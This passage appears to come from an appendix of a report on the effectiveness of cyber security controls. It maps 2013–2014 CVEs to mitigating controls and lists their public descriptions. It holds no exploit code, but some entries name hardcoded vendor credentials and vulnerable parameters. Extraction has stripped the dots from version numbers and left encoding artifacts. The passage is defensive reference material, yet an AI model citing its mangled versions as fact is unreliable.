CVE-2014-4127 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4130 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4132 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4133 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4141 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4481 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware
CVE-2014-4617 | y | y | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-4631 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2014-6040 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-6105 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-6136 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-6363 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6369 | y | n | y | y | | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6378 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-6487 | n | n | y | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-7250 | n | y | y | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-7927 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration (Access Control), Patch Management
CVE-2014-7945 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-8447 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management
CVE-2014-8638 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-8835 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-9159 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay]
CVE-2014-9163 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay]
CVE-2014-9350 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall, Anti-DoS, Firmware Updates
CVE-2014-9357 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware, Secure Configuration
CVE DetailsCVE-2013-0008
rdquowin32ksys in the kernel-mode driversin Microsoft Windows Vista SP2 x000DWindows Server 2008 SP2 R2 and R2 SP1Windows 7 Gold and SP1 x000D Windows8 Windows Server 2012 and Windows RTdoes not properly x000D handle windowbroadcast messages which allows localusers to gain x000D privileges via acrafted application aka rdquordquoWin32k ImproperMessage x000D Handling Vulnerabilityrdquordquordquo
CVE-2013-0022rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 9 allows x000D remoteattackers to execute arbitrary code viaa crafted web site that x000D triggersaccess to a deleted object aka rdquordquoInternetExplorer x000D LsGetTrailInfo Use AfterFree Vulnerabilityrdquordquordquo
CVE-2013-0084rdquoDirectory traversal vulnerability inMicrosoft SharePoint Server 2010 x000DSP1 and SharePoint Foundation 2010 SP1allows remote attackers to x000D bypassintended read restrictions for contentand hijack user x000D accounts via acrafted URL aka rdquordquoSharePoint DirectoryTraversal x000D Vulnerabilityrdquordquordquo
CVE-2013-0140SQL injection vulnerability in the Agent-Handler component in McAfee x000DePolicy Orchestrator (ePO) before 457and 46x before 466 allows x000Dremote attackers to execute arbitrary SQLcommands via a crafted x000D requestover the Agent-Server communicationchannel
CVE-2013-0149The OSPF implementation in Cisco IOS120 through 124 and 150 x000D through153 IOS-XE 2x through 39xS ASA andPIX 7x through 91 x000D FWSMNX-OS and StarOS before 14050488does not properly validate x000D LinkState Advertisement (LSA) type 1 packetsbefore performing x000D operations onthe LSA database which allows remoteattackers to cause x000D a denial ofservice (routing disruption) or obtainsensitive packet x000D information viaa (1) unicast or (2) multicast packetaka Bug IDs x000D CSCug34485CSCug34469 CSCug39762 CSCug63304and CSCug39795
CVE-2013-0172Samba 40x before 401 in certainActive Directory x000D domain-controllerconfigurations does not properly interpretAccess x000D Control Entries that arebased on an objectClass which allowsremote x000D authenticated users tobypass intended restrictions on modifyingLDAP x000D directory objects byleveraging (1) objectClass access by auser (2) x000D objectClass access by agroup or (3) write access to an attribute
CVE-2013-0174The external node classifier (ENC) APIin Foreman before 11 allows x000Dremote attackers to obtain the hashed rootpassword via an API x000D request
CVE-2013-0199The default LDAP ACIs in FreeIPA30 before 312 do not restrict x000Daccess to the (1) ipaNTTrustAuthIncomingand (2) x000D ipaNTTrustAuthOutgoingattributes which allow remote attackersto x000D obtain the Cross-Realm KerberosTrust key via unspecified vectors
CVE-2013-0253The default configuration of Apache Maven304 when using Maven x000D Wagon21 disables SSL certificate checks whichallows remote x000D attackers to spoofservers via a man-in-the-middle (MITM)attack
CVE-2013-0270OpenStack Keystone Grizzly before 20131Folsom and possibly earlier x000D allowsremote attackers to cause a denial of service(CPU and memory x000D consumption)via a large HTTP request as demonstratedby a long x000D tenant name whenrequesting a token
CVE-2013-0481The console in IBM Sterling B2B Integrator51 and 52 and Sterling File Gateway 21and 22 allows remote attackers to readstack traces by triggering (1) an error or(2) an exception
CVE-2013-0598Cross-site request forgery (CSRF)vulnerability in the Web Client in x000DIBM Rational ClearQuest 71 before71212 80 before 8008 and x000D801 before 8011 allows remote attackersto hijack the x000D authentication ofarbitrary users
CVE-2013-0619Adobe Reader and Acrobat 9x before 95310x before 1015 and x000D 11x before1101 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2012-1530 CVE-2013-0601 x000D CVE-2013-0605 CVE-2013-0616 CVE-2013-0620 and CVE-2013-0623
CVE-2013-0633Buffer overflow in Adobe Flash Playerbefore 10318351 and 11x before115502149 on Windows and Mac OSX before 10318351 and 11x before112202262 on Linux before 11111132on Android 2x and 3x and before11111537 on Android 4x allows remoteattackers to execute arbitrary code viacrafted SWF content as exploited in thewild in February 2013
CVE-2013-0649Use-after-free vulnerability in AdobeFlash Player before 10318363 and 11xbefore 116602168 on Windows before10318361 and 11x before 116602167on Mac OS X before 10318361 and11x before 112202270 on Linux before11111143 on Android 2x and 3x andbefore 11111547 on Android 4x AdobeAIR before 360597 and Adobe AIR SDKbefore 360599 allows attackers to executearbitrary code via unspecified vectors adifferent vulnerability than CVE-2013-0644
and CVE-2013-1374
CVE-2013-0746Mozilla Firefox before 180 Firefox ESR10x before 10012 and 17x x000Dbefore 1702 Thunderbird before 1702Thunderbird ESR 10x before x000D10012 and 17x before 1702 andSeaMonkey before 215 do not x000Dproperly implement quickstubs that usethe jsval data type for their x000D returnvalues which allows remote attackers toexecute arbitrary code x000D or cause adenial of service (compartment mismatchand application x000D crash) via craftedJavaScript code that is not properly handledduring x000D garbage collection
CVE-2013-0753Use-after-free vulnerability in theserializeToStream implementation x000Din the XMLSerializer component in MozillaFirefox before 180 Firefox x000D ESR10x before 10012 and 17x before1702 Thunderbird before x000D 1702Thunderbird ESR 10x before 10012 and17x before 1702 x000D and SeaMonkeybefore 215 allows remote attackers toexecute arbitrary x000D code via craftedweb content
CVE-2013-0787Use-after-free vulnerability in thensEditorIsPreformatted function x000Din editorlibeditorbasensEditorcppin Mozilla Firefox before x000D1902 Firefox ESR 17x before 1704Thunderbird before 1704 x000DThunderbird ESR 17x before 1704 andSeaMonkey before 2161 allows x000Dremote attackers to execute arbitrarycode via vectors involving an x000DexecCommand call
CVE-2013-0909The XSS Auditor in Google Chrome before2501364152 allows remote attackers toobtain sensitive HTTP Referer informationvia unspecified vectors
CVE-2013-1035The iTunes ActiveX control in Apple iTunesbefore 111 allows remote x000D attackersto execute arbitrary code or cause a denialof service x000D (memory corruption) viaa crafted web site
CVE-2013-1102The Wireless Intrusion Prevention System(wIPS) component on Cisco x000DWireless LAN Controller (WLC) deviceswith software 70 before x000D 70235071 and 72 before 721100 and 73before 731010 x000D allows remoteattackers to cause a denial of service(device reload) x000D via crafted IPpackets aka Bug ID CSCtx80743
CVE-2013-1140The XML parser in Cisco SecurityMonitoring Analysis and Response x000DSystem (MARS) allows remote attackers toread arbitrary files via an x000D externalentity declaration in conjunction with anentity reference x000D related to an XMLExternal Entity (XXE) issue aka Bug IDCSCue55093
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 19 of 28
CVE-2013-1144Memory leak in the IKEv1 implementationin Cisco IOS 151 allows x000D remoteattackers to cause a denial of service(memory consumption) via x000Dunspecified (1) IPv4 or (2) IPv6 IKEpackets aka Bug ID CSCth81055
CVE-2013-1153Cross-site request forgery (CSRF)vulnerability in the web interface x000Din Cisco Prime Infrastructure allowsremote attackers to hijack the x000Dauthentication of arbitrary users aka BugID CSCue84676
CVE-2013-1181Cisco NX-OS on Nexus 5500 devices4x and 5x before 50(3)N2(2) x000DNexus 3000 devices 5x before 50(3)U3(2)and Unified Computing x000D System(UCS) 6200 devices before 20(1w) allowsremote attackers to x000D cause a denialof service (device reload) by sending ajumbo packet to x000D the managementinterface aka Bug IDs CSCtx17544CSCts10593 and x000D CSCtx95389
CVE-2013-1303rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 6 through x000D 10allows remote attackers to execute arbitrarycode via a crafted web x000D site thattriggers access to a deleted object akardquordquoInternet Explorer x000D Use After FreeVulnerabilityrdquordquo a different vulnerabilitythan x000D CVE-2013-1304 and CVE-2013-1338rdquo
CVE-2013-1384: Adobe Shockwave Player before 1202122 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-1386.
CVE-2013-1388: Unspecified vulnerability in Adobe ColdFusion 90 before Update 10, 901 before Update 9, 902 before Update 4, and 10 before Update 9 allows attackers to obtain administrator-console access via unknown vectors.
CVE-2013-1450: Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not properly reuse TCP sessions to the proxy server, which allows remote attackers to obtain sensitive information intended for a specific host via a crafted HTML document that triggers many HTTPS requests and then triggers an HTTP request to that host, as demonstrated by reading a Cookie header, aka MSRC 12096gd.
CVE-2013-1472: Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 224 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.
CVE-2013-1553: Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 111160 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Services Security.
CVE-2013-1620: The TLS implementation in Mozilla Network Security Services (NSS) does not properly consider timing side-channel attacks on a noncompliant MAC check operation during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, a related issue to CVE-2013-0169.
CVE-2013-1627: Absolute path traversal vulnerability in NTWebServer.exe in Indusoft Studio 70 and earlier and Advantech Studio 70 and earlier allows remote attackers to read arbitrary files via a full pathname in an argument to the sub_401A90 CreateFileW function.
CVE-2013-1638: Opera before 1213 allows remote attackers to execute arbitrary code via crafted clipPaths in an SVG document.
CVE-2013-1669: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 210 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2013-1676: The SelectionIterator::GetNextSegment function in Mozilla Firefox before 210, Firefox ESR 17x before 1706, Thunderbird before 1706, and Thunderbird ESR 17x before 1706 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds read) via unspecified vectors.
CVE-2013-1700: The Mozilla Maintenance Service in Mozilla Firefox before 220 on Windows does not properly handle inability to launch the Mozilla Updater executable file, which allows local users to gain privileges via vectors involving placement of a Trojan horse executable file at an arbitrary location.
CVE-2013-1734: Cross-site request forgery (CSRF) vulnerability in attachment.cgi in Bugzilla 2x, 3x, and 40x before 4011; 41x and 42x before 427; and 43x and 44x before 441 allows remote attackers to hijack the authentication of arbitrary users for requests that commit an attachment change via an update action.
CVE-2013-1777: The JMX Remoting functionality in Apache Geronimo 3x before 301, as used in IBM WebSphere Application Server (WAS) Community Edition 3003 and other products, does not properly implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.
CVE-2013-2319: FileMaker Pro before 12 and Pro Advanced before 12 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
CVE-2013-2340: Unspecified vulnerability on the HP ProCurve JCA JCBJDA JDB JEAJFA JFB JFCJGA 658250-B21 and 658247-B21, HP 3COM routers and switches, and HP H3C routers and switches allows remote attackers to execute arbitrary code or obtain sensitive information via unknown vectors.
CVE-2013-2350: Unspecified vulnerability in HP Storage Data Protector 62X allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1897.
CVE-2013-2492: Stack-based buffer overflow in Firebird 213 through 215 before 18514 and 251 through 253 before 26623 on Windows allows remote attackers to execute arbitrary code via a crafted packet to TCP port 3050, related to a missing size check during extraction of a group number from CNCT information.
CVE-2013-2507: Multiple cross-site scripting (XSS) vulnerabilities in the Brother MFC-9970CDW printer with firmware G (103) allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to admin/log_to_net.html or (2) kind parameter to fax/copy_settings.html, a different vulnerability than CVE-2013-2670 and CVE-2013-2671.
CVE-2013-2736: Adobe Reader and Acrobat 9x before 955, 10x before 1017, and 11x before 11003 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, and CVE-2013-3341.
CVE-2013-2780: Siemens SIMATIC S7-1200 PLCs 2x and 3x allow remote attackers to cause a denial of service (defect-mode transition and control outage) via crafted packets to UDP port 161 (aka the SNMP port).
CVE-2013-2803: ProSoft RadioLinx ControlScape before 600040 uses a deficient PRNG algorithm and seeding strategy for passphrases, which makes it easier for remote attackers to obtain access via a brute-force attack.
CVE-2013-2824: Schneider Electric StruxureWare SCADA Expert Vijeo Citect 740, Vijeo Citect 720 through 730SP1, CitectSCADA 720 through 730SP1, StruxureWare PowerSCADA Expert 730 through 730SR1, and PowerLogic SCADA 720 through 720SR1 do not properly handle exceptions, which allows remote attackers to cause a denial of service via a crafted packet.
CVE-2013-2826: WellinTech KingSCADA before 312, KingAlarm&Event before 31, and KingGraphic before 312 perform authentication on the KAEClientManager console rather than on the server, which allows remote attackers to bypass intended access restrictions and discover credentials via a crafted packet to TCP port 8130.
CVE-2013-2920: The DoResolveRelativeHost function in url/url_canon_relative.cc in Google Chrome before 300159966 allows remote attackers to cause a denial of service (out-of-bounds read) via a relative URL containing a hostname, as demonstrated by a protocol-relative URL beginning with a www.google.com substring.
CVE-2013-3064: Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA6500 with firmware 1128147876 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the target parameter.
CVE-2013-3116: Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2013-3137: Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allows remote attackers to obtain sensitive information via crafted XML data in a FrontPage document, aka "XML Disclosure Vulnerability".
CVE-2013-3194: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2013-3199: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2013-3201: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2013-3203, CVE-2013-3206, CVE-2013-3207, and CVE-2013-3209.
CVE-2013-3206: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2013-3201, CVE-2013-3203, CVE-2013-3207, and CVE-2013-3209.
CVE-2013-3280: EMC RSA Authentication Agent 71x before 712 for Web for Internet Information Services has a fail-open design, which allows remote attackers to bypass intended access restrictions via vectors that trigger an agent crash.
CVE-2013-3387: Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance 86 and 9x before 92(1) allows remote attackers to cause a denial of service (disk consumption) via a flood of TCP packets to port 5400, leading to large error-log files, aka Bug ID CSCua42724.
CVE-2013-3417: The administrative web interface in Cisco Video Surveillance Operations Manager does not properly perform authentication, which allows remote attackers to watch video feeds via a crafted URL, aka Bug ID CSCtg72262.
CVE-2013-3632: The Cron service in rpc.php in OpenMediaVault allows remote authenticated users to execute cron jobs as arbitrary users and execute arbitrary commands via the username parameter.
CVE-2013-3656: Cybozu Office 910 and earlier does not properly manage sessions, which allows remote attackers to bypass authentication by leveraging knowledge of a login URL.
CVE-2013-3856: Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability".
CVE-2013-3860: Microsoft .NET Framework 20 SP2, 35, 35 SP1, 351, 4, and 45 does not properly parse a DTD during XML digital-signature validation, which allows remote attackers to cause a denial of service (application crash or hang) via a crafted signed XML document, aka "Entity Expansion Vulnerability".
CVE-2013-3893: Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help URL that triggers loading of hxds.dll.
CVE-2013-3897: Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2013-3900: The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 81, Windows Server 2012 Gold and R2, and Windows RT Gold and 81 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability".
CVE-2013-3905: Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka "S/MIME AIA Vulnerability".
CVE-2013-4223: The Gentoo Nullmailer package before 111-r2 uses world-readable permissions for /etc/nullmailer/remotes, which allows local users to obtain SMTP authentication credentials by reading the file.
CVE-2013-4436: The default configuration for salt-ssh in Salt (aka SaltStack) 0170 does not validate the SSH host key of requests, which allows remote attackers to have unspecified impact via a man-in-the-middle (MITM) attack.
CVE-2013-4478: Sup before 01321 and 014x before 01411 allows remote attackers to execute arbitrary commands via shell metacharacters in the filename of an email attachment.
CVE-2013-4529: Buffer overflow in hw/pci/pcie_aer.c in QEMU before 172 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large log_num value in a savevm image.
CVE-2013-4555: Cross-site request forgery (CSRF) vulnerability in ecrire/action/logout.php in SPIP before 2124 allows remote attackers to hijack the authentication of arbitrary users for requests that logout the user via unspecified vectors.
CVE-2013-4776: NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 54113 and earlier, GS748Tv4 54114, and GS510TP 5044 allows remote attackers to cause a denial of service (reboot or crash) via a crafted HTTP request to filesystem.
CVE-2013-4782: The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.
CVE-2013-5057: hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability".
CVE-2013-5369: IBM SPSS Analytical Decision Management 61 before IF1, 62 before IF1, and 70 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.
CVE-2013-5428: IBM WebSphere DataPower XC10 appliances 250 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.
CVE-2013-5431: Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 611 before IF 15, 620 before IF 14, 621 and 622 before IF 8, and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 611 before IF 15, 620 before IF 14, 621 and 622 before IF 8 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
CVE-2013-5494: Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.
CVE-2013-5507: The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 91 before 91(17), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.
CVE-2013-5536: Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.
CVE-2013-5559: Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.
CVE-2013-5561: The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.
CVE-2013-5751: Directory traversal vulnerability in SAP NetWeaver 7x allows remote attackers to read arbitrary files via unspecified vectors.
CVE-2013-5757: Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.
CVE-2013-5828: Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10205 and 11101, EM DB Control 11107, 11202, and 11203, and EM Plugin for DB 12102 and 12103 allows remote attackers to affect integrity via unknown vectors related to Storage Management.
CVE-2013-6167: Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.
CVE-2013-6188: Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 71 through 722 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
CVE-2013-6284: Unspecified vulnerability in the Statutory Reporting for Insurance (FS SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors, related to a "code injection vulnerability".
CVE-2013-6396: The OpenStack Python client library for Swift (python-swiftclient) 10 through 190 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
CVE-2013-6475: Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1047 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.
CVE-2013-6660: The drag-and-drop implementation in Google Chrome before 3301750117 does not properly restrict the information in WebDropData data structures, which allows remote attackers to discover full pathnames via a crafted web site.
CVE-2013-6699: The Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation on Cisco Wireless LAN Controller (WLC) devices allows remote attackers to cause a denial of service via a crafted CAPWAP packet that triggers a buffer over-read, aka Bug ID CSCuh81880.
CVE-2013-6702: The management implementation on Cisco ONS 15454 controller cards with software 98 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902.
CVE-2013-6979: The VTY authentication implementation in Cisco IOS XE 0302xxSE and 0303xxSE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227.
CVE-2013-6994: OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext, which allows remote attackers to perform session fixation attacks by sniffing the network.
CVE-2013-7004: D-Link DSR-150 with firmware before 108B44, DSR-150N with firmware before 105B64, DSR-250 and DSR-250N with firmware before 108B44, and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 108B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.
CVE-2013-7043: Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 202r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity, (2) reboot the device via the Restart parameter to goform/restart, (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity, or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic.
CVE-2013-7389: Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 Router (Rev A1) with firmware before 104B11 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceid parameter to parentalcontrols/bind.php, (2) RESULT parameter to info.php, or (3) receiver parameter to bsc_sms_send.php.
CVE-2014-0001: Buffer overflow in client/mysql.cc in Oracle MySQL and MariaDB before 5535 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.
CVE-2014-0035: The SymmetricBinding in Apache CXF before 2613 and 27x before 2710, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.
CVE-2014-0160: The (1) TLS and (2) DTLS implementations in OpenSSL 101 before 101g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.
CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file before 519, as used in the Fileinfo component in PHP before 5430 and 55x before 5514, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.
CVE-2014-0259: Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability".
CVE-2014-0266: The XMLHTTP ActiveX controls in XML Core Services 30 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 81, Windows Server 2012 Gold and R2, and Windows RT Gold and 81 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability".
CVE-2014-0294: Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability".
CVE-2014-0313: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-0321.
CVE-2014-0354: The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 100(BFQ6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.
CVE-2014-0362: Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7014G216 and 72 before 720G114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.
CVE-2014-0433: Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5613 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.
CVE-2014-0488: APT before 109 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.
CVE-2014-0493: Adobe Reader and Acrobat 10x before 1019 and 11x before 11006 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.
CVE-2014-0494: Adobe Digital Editions 201 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.
CVE-2014-0498: Stack-based buffer overflow in Adobe Flash Player before 117700269 and 118x through 120x before 120070 on Windows and Mac OS X and before 112202341 on Linux, Adobe AIR before 4001628 on Android, Adobe AIR SDK before 4001628, and Adobe AIR SDK & Compiler before 4001628 allows attackers to execute arbitrary code via unspecified vectors.
CVE-2014-0515: Buffer overflow in Adobe Flash Player before 117700279 and 118x through 130x before 1300206 on Windows and OS X and before 112202356 on Linux allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.
